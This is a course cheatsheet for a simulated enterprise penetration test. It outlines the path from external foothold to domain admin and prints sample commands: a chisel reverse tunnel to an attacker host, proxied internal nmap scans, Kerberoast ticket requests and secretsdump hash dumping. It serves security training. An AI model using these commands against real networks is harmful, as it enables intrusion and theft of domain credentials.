Attacking Enterprise Networks
Fundamentals
Overview
Simulated real-world penetration test combining all skills - External to Internal to Domain Admin.
0
Exercises
0
Flashcards
1
Mind Maps
Cheatsheet
Attack Path Overview
- External Recon: Subdomain enum, OSINT
- Initial Access: Web exploit, phishing
- Internal Pivot: Tunnel to internal network
- AD Compromise: Kerberoast, credential reuse
- Domain Admin: DCSync, Golden Ticket
External to Internal
# Gain foothold via web app # Set up pivot chisel client ATTACKER:8000 R:socks # Establish SOCKS tunnel # Scan internal proxychains nmap -sT 172.16.0.0/24 # Scan internal network via proxy
AD Takeover
GetUserSPNs.py domain/user -dc-ip DC_IP -request # Kerberoast impacket-secretsdump domain/admin@DC_IP # Dump domain hashes
Command Examples
Common Pitfalls
- Getting tunnel vision on one attack path
- Not maintaining access/persistence
- Rushing and missing enumeration
Exam Survival Tips
- This is the exam simulation - practice it!
- Time management is critical
- Have backup attack plans ready
- Document everything for report